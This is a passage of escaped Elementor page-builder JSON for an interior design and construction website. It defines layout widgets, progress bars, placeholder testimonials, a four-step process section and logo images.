oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\